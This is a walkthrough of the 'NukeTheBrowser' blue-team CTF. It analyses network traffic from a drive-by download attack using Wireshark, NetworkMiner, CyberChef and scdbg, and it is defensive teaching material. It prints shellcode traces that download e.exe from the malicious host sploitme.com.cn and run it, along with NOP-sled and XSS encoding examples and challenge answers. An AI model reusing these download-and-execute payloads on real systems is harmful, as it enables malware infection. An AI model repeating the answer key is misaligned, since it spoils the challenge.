Skip to main content

NukeTheBrowser

πŸ“… Published: 2026-04-19 14:00 | πŸ”„ Last Updated: 2026-05-12 18:42


https://cyberdefenders.org/blueteam-ctf-challenges/nukethebrowser/

Basic triage​

10.0.4.1564.236.114.1 (honeynet.org)10.0.4.15 [8fd12edd2dc1462] [8fd12edd2dc1462.] [8FD12EDD2DC1462] (Windows)
192.168.56.52192.168.56.51 [shop.honeynet.sg] (Other)
192.168.56.51
10.0.3.15192.168.56.52sploitme.com.cn
64.236.114.1
192.168.56.50192.168.56.51 [shop.honeynet.sg] (Other)
10.0.2.15192.168.56.51
10.0.5.15224.0.0.22

By using the filter http.host==sploitme.com.cn and checking the http.referer field, I can deduce the malicious website chain:

i can deduce the malicious website chain: shop.honeynet[.]sg β†’ sploitme.com[.]cn β†’ rapidshare.com.eyu32[.]ru

Q1 Multiple systems were targeted. Provide the IP address of the highest one.​

Navigate to Statistics > Conversations, and then sort by IP address to find the highest one:

10.0.5.15

Q2 What protocol do you think the attack was carried over?​

The answer was obvious

HTTP

Q3 What was the URL for the page used to serve malicious executables (don't include URL parameters)?​

Navigate to Networkminer files tab and search for exe file

We know the the website that served the malicious executable is: http://sploitme.com.cn/

using wireshark and use the filter: http.host=="sploitme.com.cn"

http://sploitme.com.cn/fg/load.php

Q4 What is the number of the packet that includes a redirect to the french version of Google and probably is an indicator for Geo-based targeting?​

Redirect: In the HTTP protocol, server-side redirection is executed by returning a status code of 301 (moved permanently) or 302 (found). Consequently, the response packet will include a Location: <newURL> header field, which instructs the browser to automatically navigate to that new page.

Respectively, in Wireshark we use the filter: http.location contains "google”

299

Q5 What was the CMS used to generate the page 'shop.honeynet.sg/catalog/'? (Three words, space in between)​

  • CMS (Content Management System): A platform that allows users to create, edit, and manage website content without needing any programming knowledge.
  • General-purpose CMS (Blogs, News, Corporate websites): WordPress (powering over 40% of all websites globally), Joomla, and Drupal.
  • E-commerce CMS: Shopify, Magento, WooCommerce, OpenCart, and osCommerce systems.
  • A Zero-day Goldmine: These platforms are a goldmine for hackers looking to discover and exploit zero-day vulnerabilities.
  • Reconnaissance Technique: Attackers often use the HTTP Host header to probe and enumerate the targe
  • Using http.host==”shop.honey.net.sg” and skim through the packet to find any special one.

The server also have the cookie named OsCsid, also an artifacts of osCommerce installation

I asked AI for the full name.

osCommerce Online Merchant

Q6 What is the number of the packet that indicates that 'show.php' will not try to infect the same host twice?​

i use the filter: http.request.uri contains "show.php”

I skimmed through all the packets and clearly the uri: /fg/show.php is malicious as it served obfuscated javascript

And packet no.366 caught my attention because: it’s the third request from 10.0.2.15 to 192.168.56.52 GET /fg/show.php?s=3feb5a6b2f

The server returns a 404 error, which is an intentional behavior designed to avoid infecting the same host multiple times."

366

Q7 One of the exploits being served targets a vulnerability in "msdds.dll". Provide the corresponding CVE number.​

Using google with the dll file as the keyword:

CVE-2005-2127

Q8 What is the name of the executable being served via 'http://sploitme.com.cn/fg/load.php?e=8' ?​

Extract the Javascript found in Q6, there are two of them

and use an online javascript compiler (change val into console.log)

There are 4 block of obfucated code like this

We then use cyberchef:

  • swap endianess: for windows LE type
  • From hex: to binary

Here we can see some patterns were revealed related to the load.php?e=8

Save the output as shellcode.bin and using scdbg to analyze it:

scdbg -f shellcode.bin /findsc

4010d7 WinExec(C:\users\cuong_nguyen\AppData\Local\Temp\e.exe)
4010e0 ExitThread(0)
tip

Here the shellcode import urlmon.dll: the dll relates to internect connection and file download

Based on the scdbg trace (WinExec(C:\users\...\Temp\e.exe)), the name of the executable is e.exe

Q9 One of the malicious files was first submitted for analysis on VirusTotal at 2010-02-17 11:02:35 and has an MD5 hash ending with '78873f791'. Provide the full MD5 hash.​

The easiest method to solve this question is to use Networkminer, navigate to files tab and search for executable files.

Networkminer already calculate the hash for us - which exactly matched the hash in the question.

52312bb96ce72f230f0350e78873f791

Q10 What is the name of the function that hosted the shellcode relevant to 'http://sploitme.com.cn/fg/load.php?e=3'?​

From the analysis in Q8, we knew that sploitme.com.cn/fg/load[.]php?e=3 related to the first obfuscated block

Which is

The answer is: aolwinamp

Q11 Deobfuscate the JS at 'shop.honeynet.sg/catalog/' and provide the value of the 'click' parameter in the resulted URL.​

Use the same process as Q8

84c090bd86

Q12 Deobfuscate the JS at 'rapidshare.com.eyu32.ru/login.php' and provide the value of the 'click' parameter in the resulted URL.​

Same as the previous question

The URL decode function:

3feb5a6b2f

Q13 What was the version of 'mingw-gcc' that compiled the malware?​

Use strings to find out if there are any hard code artifact in the malware

strings video.exe | grep "gcc"
/opt/local/var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_ports_cross_i386-mingw32-gcc/work/gcc-3.4.5-20060117-1/gcc/config/i386/w32-shared-ptr.c

3.4.5

Q14 The shellcode used a native function inside 'urlmon.dll' to download files from the internet to the compromised host. What is the name of the function?​

We already figured out in Q8

4010ca URLDownloadToFileA(http://sploitme.com.cn/fg/load.php?e=8, C:\users\cuong_nguyen\AppData\Local\Temp\e.exe)

URLDownloadToFile

Key takeaway​

Encoding types​

  1. The JavaScript Unicode Escape Sequence format.
  • The %u indicator (The Telltale Sign): This is the most obvious identifier. In programming languages (especially JavaScript and legacy browsers), the % sign acts as an escape character, and u stands for Unicode. It instructs the system: "The next 4 characters represent a Unicode code point."
  • Limited Alphabet: If you look closely at the characters following %u, you will notice they exclusively consist of digits from 0-9 and letters from A-F (e.g., C, B, D, E). This is strictly the Hexadecimal (base-16) numeral system. You will absolutely never see letters like G, H, or Z here.
  • Example: %u9090%u9090 (This translates to standard NOP sleds \x90\x90\x90\x90 packed into 2-byte chunks).
  1. Hex Encoding (C/C++ Format)
  • Description: Uses the \x prefix instead of %u, followed by exactly 2 hexadecimal characters (representing 1 byte of data). This is the standard way to represent raw shellcode or byte arrays in languages like C, C++, and Python.
  • Example: \x33\xC0\x64\x8B (In x86 assembly, this translates to xor eax, eax; mov eax, fs:[edx]).
  1. URL Encoding (Percent-Encoding)
  • Description: Similar to Hex encoding, but uses the % sign followed by 2 hex characters. It is predominantly seen in web address bars, HTTP requests, and cross-site scripting (XSS) payloads to safely transmit special characters over the internet.
  • Example: %3Cscript%3E (This translates to <script>). Or for raw bytes: %33%C0%64%8B.
  1. XOR / Custom Cipher
  • Description: Appears as a completely random blob of gibberish (high entropy). There is no discernible pattern, and no clear prefix like %u or \x. When you encounter this, it means the payload is encrypted. You must rely on tools like scdbg or manually trace the surrounding JavaScript/Assembly code (as we did in the previous question) to extract the decoding "key" and algorithm.
  • Example: Ý}ͱë© (Raw byte garbage that cannot be read or executed until the shellcode's decoder stub XORs it against a static key like 0x99).